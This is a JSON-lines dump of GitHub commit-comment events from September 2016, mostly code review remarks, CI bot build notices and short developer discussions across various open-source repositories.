{"id":"4554633277","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":18999064,"position":null,"line":null,"path":null,"commit_id":"ccb0482dc89ece10eb25da83729d47a27550cd6c","created_at":"2016-09-13T10:05:56Z","updated_at":"2016-09-13T10:05:56Z","body":"[tests/testthat/test-nLTTstat.R:59:1:](https://github.com/richelbilderbeek/nLTT/blob/ccb0482dc89ece10eb25da83729d47a27550cd6c/tests/testthat/test-nLTTstat.R#L59) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-13T10:05:56Z"}
{"id":"4554636000","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18999070,"position":null,"line":null,"path":null,"commit_id":"f6595bd1d13d7007089b21f5e704aa16375c1382","created_at":"2016-09-13T10:06:29Z","updated_at":"2016-09-13T10:06:29Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f6595bd1d13d7007089b21f5e704aa16375c1382-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f6595bd1d13d7007089b21f5e704aa16375c1382-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T10:06:29Z"}
{"id":"4554637827","type":"CommitCommentEvent","actor":{"login":"naomipol"},"repo":{"name":"shulamyt/shareMyBooks"},"payload":{"comment":{"id":18999074,"position":28,"line":36,"path":"server/persistence/userPersistence.js","commit_id":"97053c8edd6b095a33f230a322ec37c02cc515e9","created_at":"2016-09-13T10:06:53Z","updated_at":"2016-09-13T10:06:53Z","body":"use `join()`"}},"created_at":"2016-09-13T10:06:53Z"}
{"id":"4554638369","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18999076,"position":null,"line":null,"path":null,"commit_id":"f81a5fe3017d37106ad3d96f26d152f151a7f133","created_at":"2016-09-13T10:07:01Z","updated_at":"2016-09-13T10:07:01Z","body":"I do agree with the sentiment of the message. Serializing is for writing the profile to disk and read-only profiles should never be written to disk. But I have a sneaking suspicion that serializing and deserializing may also be used to duplicate a profile."}},"created_at":"2016-09-13T10:07:01Z"}
{"id":"4554647700","type":"CommitCommentEvent","actor":{"login":"Hamayama"},"repo":{"name":"shirok/Gauche"},"payload":{"comment":{"id":18999105,"position":null,"line":null,"path":null,"commit_id":"a25aaf3a1320dbcfd30107fbda0b579791a8b3b0","created_at":"2016-09-13T10:09:00Z","updated_at":"2016-09-13T10:09:00Z","body":"doc/coresyn.texi の\r\nBuiltin Module の gauche.keyword の説明のところにも、\r\n関連する記述があるようです。"}},"created_at":"2016-09-13T10:09:00Z"}
{"id":"4554648611","type":"CommitCommentEvent","actor":{"login":"snak3ater"},"repo":{"name":"BenzoRoms/packages_apps_Settings"},"payload":{"comment":{"id":18999106,"position":null,"line":null,"path":null,"commit_id":"552f2e4b5f5f9db2c3818fad86a18c49559dfda4","created_at":"2016-09-13T10:09:13Z","updated_at":"2016-09-13T10:09:13Z","body":"Yes. Removed override. Now getting no errors. But switch itself is acting weird. As soon as settings app is closed, switch auyomatically goes back to its default state"}},"created_at":"2016-09-13T10:09:13Z"}
{"id":"4554649535","type":"CommitCommentEvent","actor":{"login":"chamsaman"},"repo":{"name":"chamsaman/Sami"},"payload":{"comment":{"id":18999107,"position":null,"line":null,"path":null,"commit_id":"83cdf0d842802f3e3292e7ac45a1efdc8bf8a442","created_at":"2016-09-13T10:09:21Z","updated_at":"2016-09-13T10:09:21Z","body":"I am wanting to create help overlays like the ones you see when ICS loads for the first time or in apps like ES File Explorer or Apex Launcher (there are more, but I can't think of them right now). Is this just a relative layout with one view sitting on top of the other? I haven't been able to find any sample code for doing such a thing. Anyone know how this is done or have any ideas?"}},"created_at":"2016-09-13T10:09:21Z"}
{"id":"4554650696","type":"CommitCommentEvent","actor":{"login":"naomipol"},"repo":{"name":"shulamyt/shareMyBooks"},"payload":{"comment":{"id":18999112,"position":20,"line":21,"path":"server/service/userService.js","commit_id":"dfd3793e578c50a5be86bbb2f3db85ff71a2ea0d","created_at":"2016-09-13T10:09:35Z","updated_at":"2016-09-13T10:09:35Z","body":"I think the resolve should return the user id - so you could return it to the client (in the `res`)"}},"created_at":"2016-09-13T10:09:35Z"}
{"id":"4554656542","type":"CommitCommentEvent","actor":{"login":"sonora"},"repo":{"name":"osmandapp/Osmand"},"payload":{"comment":{"id":18999120,"position":null,"line":null,"path":null,"commit_id":"e3ccf71aade0904455178b630325061c85f21e7b","created_at":"2016-09-13T10:10:47Z","updated_at":"2016-09-13T10:10:47Z","body":"Sure, no prob, someone caught it and we corrected  :)"}},"created_at":"2016-09-13T10:10:47Z"}
{"id":"4554656908","type":"CommitCommentEvent","actor":{"login":"R32"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18999122,"position":null,"line":null,"path":null,"commit_id":"5b8bc7dd3dfb8999df8d86ccfdb9273dcc933d36","created_at":"2016-09-13T10:10:52Z","updated_at":"2016-09-13T10:10:52Z","body":"Actually, I want to solve this problem, I try to make `@:pure` with `flash.memory`, but it does not work.\r\n\r\n```haxe\r\nvar byte = haxe.io.Bytes.alloc(1024);\r\nvar p = byte.get(0);\r\nflash.Memory.setByte(p, flash.Memory.getByte(p));\r\nflash.Memory.setByte(p + 1, flash.Memory.getByte(p + 101));\r\nflash.Memory.setByte(p + 2, flash.Memory.getByte(p + 102));\r\nflash.Memory.setByte(p + 3, flash.Memory.getByte(p + 103));\r\n```\r\ndump file: both in 3.2.1 and git build\r\n\r\n```js\r\nvar byte = haxe.io.Bytes.alloc(1024);\r\nvar p = byte.get(0);\r\n{\r\n\tvar v = __vmem_get__(0, p);\r\n\t__vmem_set__(0, p, v);\r\n};\r\n{\r\n\tvar v1 = __vmem_get__(0, p + 101);\r\n\t__vmem_set__(0, p + 1, v1);\r\n};\r\n{\r\n\tvar v2 = __vmem_get__(0, p + 102);\r\n\t__vmem_set__(0, p + 2, v2);\r\n};\r\n{\r\n\tvar v3 = __vmem_get__(0, p + 103);\r\n\t__vmem_set__(0, p + 3, v3);\r\n};\r\n```"}},"created_at":"2016-09-13T10:10:52Z"}
{"id":"4554657753","type":"CommitCommentEvent","actor":{"login":"damianvila"},"repo":{"name":"googleads/videojs-ima"},"payload":{"comment":{"id":18999125,"position":null,"line":null,"path":null,"commit_id":"e716d60d2cebe9dc830a09044b3eacc18d2dfb17","created_at":"2016-09-13T10:11:04Z","updated_at":"2016-09-13T10:11:04Z","body":"Our client asks that pre and post-roll be clearly marked as \"Advertisement\". To that end, we need to make the Advertisement block (including the countdown) way bigger, and since it's just a small sing in the default player, I had to change the styles and make it float over the controls with a negative top value. (it would be better to have it at the top of the video, but the controls div is absolute positioned, and modifying everything would be a hassle.)\r\nMy current styles looks like this:\r\n\r\n```\r\n#ima-countdown-div {\r\n  font-size: 1.4em;\r\n  line-height: 1.4;\r\n  padding: .25em .5em;\r\n  border: 2px solid #ccc;\r\n  background-color: rgba(0,0,0,.65);\r\n  position: absolute;\r\n  top: -2.4em;\r\n  left: 1em;\r\n  height: auto;\r\n  color: #FFFFFF;\r\n  box-shadow: 0 .2em .2em 0 rgba(0,0,0,.35);\r\n}\r\n```\r\n\r\nThe end result in the player looks like this:\r\n![preroll](https://cloud.githubusercontent.com/assets/1840285/18467967/2f6bf87c-79a2-11e6-82a5-91b3a4ca7c98.png)\r\n\r\nI fixed the volume issue adding \"sliderDiv.style.display = 'none'\" in videojs.ima.js inside player.ima.hideAdControls_. This looks like the ideal solution, since the problem comes from this property being missing inside the mouse out function (the display: block part is present in the mouse over, though.)\r\n\r\nBut if I modify #ima-control-div to include \"overflow: hidden\", #ima-countdown-div dissapears, since it's technically inside the controls div. If you prefer to keep the overflow: hidden, though, I'll modify it in my project when there's a new release, since I need the big Advertisement sing in pre and post rolls.\r\n\r\nBtw: I'm also turning off the Ads # counter (\"n of n\") with a new custom setting (adsCounter) set in options, since I don't need it and there's no actual option to turn it off."}},"created_at":"2016-09-13T10:11:04Z"}
{"id":"4554661021","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"BenzoRoms/packages_apps_Settings"},"payload":{"comment":{"id":18999132,"position":null,"line":null,"path":null,"commit_id":"552f2e4b5f5f9db2c3818fad86a18c49559dfda4","created_at":"2016-09-13T10:11:45Z","updated_at":"2016-09-13T10:11:45Z","body":"And you have all these commits\r\nframeworks/base\r\nhttps://github.com/BenzoRoms/frameworks_base/commit/a81644152f3b42c51916cce3ecc938af4bd1a578\r\n\r\nFrameworks/support\r\nhttps://github.com/BenzoRoms/frameworks_support/commit/2ed63d49dfaa08ab689105495704e857c1e76ca9\r\n\r\nthen the settings commits?"}},"created_at":"2016-09-13T10:11:45Z"}
{"id":"4554669626","type":"CommitCommentEvent","actor":{"login":"vinesharya"},"repo":{"name":"vinesharya/hello-world"},"payload":{"comment":{"id":18999150,"position":null,"line":null,"path":null,"commit_id":"fd371bd3eb5c1f4a02c7eb93d158032970ad750b","created_at":"2016-09-13T10:13:32Z","updated_at":"2016-09-13T10:13:32Z","body":"cahnges done"}},"created_at":"2016-09-13T10:13:32Z"}
{"id":"4554670413","type":"CommitCommentEvent","actor":{"login":"luckyandyzhang"},"repo":{"name":"luckyandyzhang/DanmakuFlameMaster"},"payload":{"comment":{"id":18999159,"position":null,"line":null,"path":null,"commit_id":"181a60b07b2c772ed0d2b2bca4815a782bc2aee8","created_at":"2016-09-13T10:13:43Z","updated_at":"2016-09-13T10:13:43Z","body":"处理弹幕点击的触摸事件，使得被DanmakuView覆盖的View可以适当地响应触摸事件。也就是说，如果DanmakuView没有消费掉触摸事件，则会传给其他View处理"}},"created_at":"2016-09-13T10:13:43Z"}
{"id":"4554672004","type":"CommitCommentEvent","actor":{"login":"igorpocta"},"repo":{"name":"ondrs/upload-manager"},"payload":{"comment":{"id":18999161,"position":null,"line":null,"path":null,"commit_id":"eb65e4ef9d15beffc87abd861f4ab5860dbd3d42","created_at":"2016-09-13T10:14:05Z","updated_at":"2016-09-13T10:14:05Z","body":"Zrovna jsem to chtěl napsat :D Teď jsem s tím zápasil na Ignum :D"}},"created_at":"2016-09-13T10:14:05Z"}
{"id":"4554673066","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":18999163,"position":null,"line":null,"path":null,"commit_id":"df8d535230d4066017567b36964f5b854be9090d","created_at":"2016-09-13T10:14:18Z","updated_at":"2016-09-13T10:14:18Z","body":"Actually it does not matter. It will go to the max anyway."}},"created_at":"2016-09-13T10:14:18Z"}
{"id":"4554675468","type":"CommitCommentEvent","actor":{"login":"Pawnfield"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":18999176,"position":null,"line":null,"path":null,"commit_id":"016cb7cd9bd20c1e48ae133939520776096f3902","created_at":"2016-09-13T10:14:48Z","updated_at":"2016-09-13T10:14:48Z","body":"I got the exact same issue. Likely some function is in a wrong (infinite?) loop."}},"created_at":"2016-09-13T10:14:48Z"}
{"id":"4554676812","type":"CommitCommentEvent","actor":{"login":"siovene"},"repo":{"name":"siovene/cordova-plugin-ocf-demo"},"payload":{"comment":{"id":18999178,"position":null,"line":null,"path":null,"commit_id":"1c17798489df2208255ee050105e4b91d97fffa1","created_at":"2016-09-13T10:15:10Z","updated_at":"2016-09-13T10:15:10Z","body":"Hi... something weird, I can't find this commit anywhere except on this link. It seems to be out-of-tree... Did you want to do this as a pull-request? Or what happened? :-)"}},"created_at":"2016-09-13T10:15:10Z"}
{"id":"4554680535","type":"CommitCommentEvent","actor":{"login":"snak3ater"},"repo":{"name":"BenzoRoms/packages_apps_Settings"},"payload":{"comment":{"id":18999192,"position":null,"line":null,"path":null,"commit_id":"552f2e4b5f5f9db2c3818fad86a18c49559dfda4","created_at":"2016-09-13T10:15:56Z","updated_at":"2016-09-13T10:15:56Z","body":"Yup.. Got this frameworks patch and settings commits too. Shouldn't get any errors here but I don't know why error showing up here"}},"created_at":"2016-09-13T10:15:56Z"}
{"id":"4554686136","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"BenzoRoms/packages_apps_Settings"},"payload":{"comment":{"id":18999200,"position":null,"line":null,"path":null,"commit_id":"552f2e4b5f5f9db2c3818fad86a18c49559dfda4","created_at":"2016-09-13T10:17:10Z","updated_at":"2016-09-13T10:17:10Z","body":"I don't know then. "}},"created_at":"2016-09-13T10:17:10Z"}
{"id":"4554690896","type":"CommitCommentEvent","actor":{"login":"ArsenShnurkov"},"repo":{"name":"Maximus5/conemu-inside"},"payload":{"comment":{"id":18999207,"position":4,"line":20,"path":"ConEmuWinForms/Util/CommandLineBuilder.cs","commit_id":"857eb7c45f0ded41eab214faa36d13fe7c9960d2","created_at":"2016-09-13T10:18:11Z","updated_at":"2016-09-13T10:18:11Z","body":"I compared this CommandLineBuilder and one from msbuild. This one contains less code, for example it doesn't depend on ITaskItem, so it can be compiled separately.\r\n\r\nBut I didn't understood, how it is related to \"async\" problem, they are 2 sets of unrelated code. So why not to make just CommandLineBuilder public?"}},"created_at":"2016-09-13T10:18:11Z"}
{"id":"4554694062","type":"CommitCommentEvent","actor":{"login":"mwittig"},"repo":{"name":"pimatic/rfcontroljs"},"payload":{"comment":{"id":18999214,"position":5,"line":814,"path":"test/lib-controller.coffee","commit_id":"49130ea1768f9f8d0f54dc8603e346c160187c9f","created_at":"2016-09-13T10:18:53Z","updated_at":"2016-09-13T10:18:53Z","body":"No, I think the pulse length should be ok. The has been fixed by the following commit: https://github.com/pimatic/rfcontroljs/commit/8381132c4c08b61084ce4350ff8e783a279b5592"}},"created_at":"2016-09-13T10:18:53Z"}
{"id":"4554694964","type":"CommitCommentEvent","actor":{"login":"nicklauslittle"},"repo":{"name":"nicklauslittle/xbmc"},"payload":{"comment":{"id":18999218,"position":null,"line":null,"path":null,"commit_id":"78b230a77a3c89ce45ed0109ec6bf1e7311b0f9c","created_at":"2016-09-13T10:19:06Z","updated_at":"2016-09-13T10:19:06Z","body":"Thanks! I didn't know how I was going to do this."}},"created_at":"2016-09-13T10:19:06Z"}
{"id":"4554701275","type":"CommitCommentEvent","actor":{"login":"vinesharya"},"repo":{"name":"vinesharya/hello-world"},"payload":{"comment":{"id":18999225,"position":null,"line":null,"path":null,"commit_id":"eda5a95da1a79aed68b54e9f8db2f17594195433","created_at":"2016-09-13T10:20:27Z","updated_at":"2016-09-13T10:20:27Z","body":"deleted"}},"created_at":"2016-09-13T10:20:27Z"}
{"id":"4554703331","type":"CommitCommentEvent","actor":{"login":"sandermangel"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":18999227,"position":204,"line":204,"path":"app/code/community/Adyen/Payment/Block/ApplePay.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-13T10:20:54Z","updated_at":"2016-09-13T10:20:54Z","body":"the `$customer` should already contain the full `Mage_Customer_Model_Customer` object with all data"}},"created_at":"2016-09-13T10:20:54Z"}
{"id":"4554707198","type":"CommitCommentEvent","actor":{"login":"sandermangel"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":18999232,"position":207,"line":207,"path":"app/code/community/Adyen/Payment/Block/ApplePay.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-13T10:21:48Z","updated_at":"2016-09-13T10:21:48Z","body":"Line 207 - 211 could be refactored to `$lastname = trim($customerData['middlename'] . \" \" . $customerData['lastname']);`"}},"created_at":"2016-09-13T10:21:48Z"}
{"id":"4554709090","type":"CommitCommentEvent","actor":{"login":"sandermangel"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":18999236,"position":224,"line":224,"path":"app/code/community/Adyen/Payment/Block/ApplePay.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-13T10:22:14Z","updated_at":"2016-09-13T10:22:14Z","body":"Same applies as line 207 :)"}},"created_at":"2016-09-13T10:22:14Z"}
{"id":"4554715163","type":"CommitCommentEvent","actor":{"login":"sandermangel"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":18999258,"position":240,"line":240,"path":"app/code/community/Adyen/Payment/Block/ApplePay.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-13T10:23:34Z","updated_at":"2016-09-13T10:23:34Z","body":"Only gives known region dropdown ID, `getRegion` gives any value entered either in dropdown or input field"}},"created_at":"2016-09-13T10:23:34Z"}
{"id":"4554720922","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18999274,"position":null,"line":null,"path":null,"commit_id":"00207d817783db33963727193f7cddf13212a2ad","created_at":"2016-09-13T10:24:53Z","updated_at":"2016-09-13T10:24:53Z","body":"os_2_0_develop_linux (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-00207d817783db33963727193f7cddf13212a2ad-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-00207d817783db33963727193f7cddf13212a2ad-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T10:24:53Z"}
{"id":"4554722409","type":"CommitCommentEvent","actor":{"login":"sandermangel"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":18999279,"position":83,"line":83,"path":"app/code/community/Adyen/Payment/Block/ApplePay.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-13T10:25:15Z","updated_at":"2016-09-13T10:25:15Z","body":"Couldn't find the `product` key being set anywhere. Did you mean to store it on line 85?"}},"created_at":"2016-09-13T10:25:15Z"}
{"id":"4554725493","type":"CommitCommentEvent","actor":{"login":"yayraj"},"repo":{"name":"yayraj/basic-python-programs"},"payload":{"comment":{"id":18999282,"position":null,"line":null,"path":null,"commit_id":"9963088dba2c74b319d251dadaaae8112390211f","created_at":"2016-09-13T10:25:55Z","updated_at":"2016-09-13T10:25:55Z","body":"Oh lol I can comment on a commit as well!"}},"created_at":"2016-09-13T10:25:55Z"}
{"id":"4554726681","type":"CommitCommentEvent","actor":{"login":"sandermangel"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":18999283,"position":53,"line":53,"path":"app/code/community/Adyen/Payment/Block/Form/ApplePay.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-13T10:26:13Z","updated_at":"2016-09-13T10:26:13Z","body":"Giving this block a name would allow future devs to overwrite the template"}},"created_at":"2016-09-13T10:26:13Z"}
{"id":"4554728878","type":"CommitCommentEvent","actor":{"login":"Bogdaan"},"repo":{"name":"Bogdaan/vozimby-static"},"payload":{"comment":{"id":18999285,"position":5,"line":19,"path":"styles/main.scss","commit_id":"6b1d5b0bce8b66cd38d05310025164ac17bbf723","created_at":"2016-09-13T10:26:42Z","updated_at":"2016-09-13T10:26:42Z","body":"тут задублировано"}},"created_at":"2016-09-13T10:26:42Z"}
{"id":"4554731241","type":"CommitCommentEvent","actor":{"login":"sandermangel"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":18999289,"position":57,"line":57,"path":"app/code/community/Adyen/Payment/Model/Adyen/ApplePay.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-13T10:27:14Z","updated_at":"2016-09-13T10:27:14Z","body":"Check if $data is an array, otherwise `Varien_Object` would either throw error or fail to be created"}},"created_at":"2016-09-13T10:27:14Z"}
{"id":"4554732191","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18999293,"position":null,"line":null,"path":null,"commit_id":"00207d817783db33963727193f7cddf13212a2ad","created_at":"2016-09-13T10:27:27Z","updated_at":"2016-09-13T10:27:27Z","body":"os_2_0_develop_linux (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-00207d817783db33963727193f7cddf13212a2ad-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-00207d817783db33963727193f7cddf13212a2ad-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T10:27:27Z"}
{"id":"4554736320","type":"CommitCommentEvent","actor":{"login":"sandermangel"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":18999304,"position":77,"line":77,"path":"app/code/community/Adyen/Payment/controllers/ApplePayController.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-13T10:28:23Z","updated_at":"2016-09-13T10:28:23Z","body":"Log response since it's not valid?"}},"created_at":"2016-09-13T10:28:23Z"}
{"id":"4554736514","type":"CommitCommentEvent","actor":{"login":"bangprovn"},"repo":{"name":"bangprovn/android_kernel_lge_g3"},"payload":{"comment":{"id":18999305,"position":null,"line":null,"path":null,"commit_id":"682e19667674c3d21de4056939611da3b20d99bf","created_at":"2016-09-13T10:28:26Z","updated_at":"2016-09-13T10:28:26Z","body":"@quesoo I think :))"}},"created_at":"2016-09-13T10:28:26Z"}
{"id":"4554736927","type":"CommitCommentEvent","actor":{"login":"Bogdaan"},"repo":{"name":"Bogdaan/vozimby-static"},"payload":{"comment":{"id":18999306,"position":5,"line":7,"path":"components/navigation/navigation.jade","commit_id":"6b8fce4610144f2cddbb3ef28fe24df5ff83c388","created_at":"2016-09-13T10:28:32Z","updated_at":"2016-09-13T10:28:32Z","body":"для себя: тут ошибка, необходимы полные ссылки (вынести в параметр)"}},"created_at":"2016-09-13T10:28:32Z"}
{"id":"4554737485","type":"CommitCommentEvent","actor":{"login":"R32"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18999308,"position":null,"line":null,"path":null,"commit_id":"5b8bc7dd3dfb8999df8d86ccfdb9273dcc933d36","created_at":"2016-09-13T10:28:39Z","updated_at":"2016-09-13T10:28:39Z","body":"I think that may be caused by **`untyped`**,  Because if I replace it: \r\n\r\n```haxe\r\nclass Memory {\r\n\tstatic var b = haxe.io.Bytes.alloc(1024);\r\n\tpublic static function getByte(i:Int) return untyped b.get(i);\r\n\tpublic static function setByte(i:Int, v:Int) b.set(i, v);\r\n}\r\n\r\nclass Test {\r\n\tstatic function main() {\r\n\t\tvar byte = haxe.io.Bytes.alloc(1024);\r\n\t\tvar p = byte.get(0);\r\n\t\tMemory.setByte(p, Memory.getByte(p));\r\n\t\tMemory.setByte(p + 1, Memory.getByte(p + 101));\r\n\t\tMemory.setByte(p + 2, Memory.getByte(p + 102));\r\n\t\tMemory.setByte(p + 3, Memory.getByte(p + 103));\r\n\t}\r\n}\r\n```\r\nIt will build a cleaner code:\r\n\r\n```js\r\nvar byte = haxe.io.Bytes.alloc(1024);\r\nvar p = byte.b[0];\r\nMemory.setByte(p, Memory.getByte(p));\r\nMemory.setByte(p + 1, Memory.getByte(p + 101));\r\nMemory.setByte(p + 2, Memory.getByte(p + 102));\r\nMemory.setByte(p + 3, Memory.getByte(p + 103));\r\n```"}},"created_at":"2016-09-13T10:28:39Z"}
{"id":"4554738887","type":"CommitCommentEvent","actor":{"login":"makoto"},"repo":{"name":"makoto/blockparty"},"payload":{"comment":{"id":18999312,"position":23,"line":12,"path":"truffle.js","commit_id":"496966c6f50048744a110bb5b22fd80506113511","created_at":"2016-09-13T10:28:57Z","updated_at":"2016-09-13T10:28:57Z","body":"probably this is not needed."}},"created_at":"2016-09-13T10:28:57Z"}
{"id":"4554739283","type":"CommitCommentEvent","actor":{"login":"subratpanda1"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18999315,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-13T10:29:02Z","updated_at":"2016-09-13T10:29:02Z","body":"I am getting crash on invoking JS callback from onActivityResult after upgrading to 0.33.0 ."}},"created_at":"2016-09-13T10:29:02Z"}
{"id":"4554740146","type":"CommitCommentEvent","actor":{"login":"naomipol"},"repo":{"name":"shulamyt/shareMyBooks"},"payload":{"comment":{"id":18999317,"position":27,"line":18,"path":"server/rest/userRest.js","commit_id":"97053c8edd6b095a33f230a322ec37c02cc515e9","created_at":"2016-09-13T10:29:14Z","updated_at":"2016-09-13T10:29:14Z","body":"any ways the server needs to send a response back to the client.\r\nSo in this case Success or Failure. "}},"created_at":"2016-09-13T10:29:14Z"}
{"id":"4554742146","type":"CommitCommentEvent","actor":{"login":"dasgarner"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":18999329,"position":null,"line":null,"path":null,"commit_id":"203b85eb8f1cf2cbb029105ea033959e93259171","created_at":"2016-09-13T10:29:39Z","updated_at":"2016-09-13T10:29:39Z","body":"Have you tested that the region playlist form (edit timeline button) in the Layout designer still opens after opening a widget add/edit form?\r\n\r\nThat process makes use of the second parameter to `XiboFormRender` - `XiboFormRender(timelineForm.url, timelineForm.value);`"}},"created_at":"2016-09-13T10:29:39Z"}
{"id":"4554742276","type":"CommitCommentEvent","actor":{"login":"quesoo"},"repo":{"name":"bangprovn/android_kernel_lge_g3"},"payload":{"comment":{"id":18999330,"position":null,"line":null,"path":null,"commit_id":"682e19667674c3d21de4056939611da3b20d99bf","created_at":"2016-09-13T10:29:41Z","updated_at":"2016-09-13T10:29:41Z","body":"this config is not set in defconfig\r\n\r\nCONFIG_CC_OPTIMIZE_FOR_SIZE=y\r\n# CONFIG_CC_OPTIMIZE_DEFAULT is not set"}},"created_at":"2016-09-13T10:29:41Z"}
{"id":"4554743380","type":"CommitCommentEvent","actor":{"login":"ChameleonTartu"},"repo":{"name":"deiwin/vim-dotfiles"},"payload":{"comment":{"id":18999332,"position":null,"line":null,"path":null,"commit_id":"41386b4c739f0a548ed833073fc7d2ae465c98db","created_at":"2016-09-13T10:29:56Z","updated_at":"2016-09-13T10:29:56Z","body":"What does this change do?"}},"created_at":"2016-09-13T10:29:56Z"}
{"id":"4554746906","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18999337,"position":null,"line":null,"path":null,"commit_id":"5b8bc7dd3dfb8999df8d86ccfdb9273dcc933d36","created_at":"2016-09-13T10:30:45Z","updated_at":"2016-09-13T10:30:45Z","body":"Yes, the optimizer does not recurse into the `__vmem_set__` things because it has no idea what it is. I suppose we can add all these funky special things here and hope for the best: https://github.com/HaxeFoundation/haxe/blob/development/src/optimization/analyzerTexpr.ml#L141"}},"created_at":"2016-09-13T10:30:45Z"}
{"id":"4554748822","type":"CommitCommentEvent","actor":{"login":"bangprovn"},"repo":{"name":"bangprovn/android_kernel_lge_g3"},"payload":{"comment":{"id":18999340,"position":null,"line":null,"path":null,"commit_id":"682e19667674c3d21de4056939611da3b20d99bf","created_at":"2016-09-13T10:31:12Z","updated_at":"2016-09-13T10:31:12Z","body":"@quesoo sorry I don't check on this setting as I made this in a hurry, btw is G3 fully working?"}},"created_at":"2016-09-13T10:31:12Z"}
{"id":"4554751127","type":"CommitCommentEvent","actor":{"login":"sandermangel"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":18999347,"position":203,"line":203,"path":"app/code/community/Adyen/Payment/controllers/ApplePayController.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-13T10:31:42Z","updated_at":"2016-09-13T10:31:42Z","body":"Noticed mixed array syntax, new short and this longer version"}},"created_at":"2016-09-13T10:31:42Z"}
{"id":"4554752024","type":"CommitCommentEvent","actor":{"login":"naomipol"},"repo":{"name":"shulamyt/shareMyBooks"},"payload":{"comment":{"id":18999348,"position":31,"line":22,"path":"server/rest/userRest.js","commit_id":"97053c8edd6b095a33f230a322ec37c02cc515e9","created_at":"2016-09-13T10:31:55Z","updated_at":"2016-09-13T10:31:55Z","body":"You need to return the user id - if the use exists, So the client could request the user with get-user"}},"created_at":"2016-09-13T10:31:55Z"}
{"id":"4554753955","type":"CommitCommentEvent","actor":{"login":"skyingcc"},"repo":{"name":"skyingcc/eternityspring.github.io"},"payload":{"comment":{"id":18999350,"position":3,"line":13,"path":"assets/resume.json","commit_id":"5762b294f2f77e4dae5fd463959464cec135bd48","created_at":"2016-09-13T10:32:24Z","updated_at":"2016-09-13T10:32:24Z","body":"空旷旷"}},"created_at":"2016-09-13T10:32:24Z"}
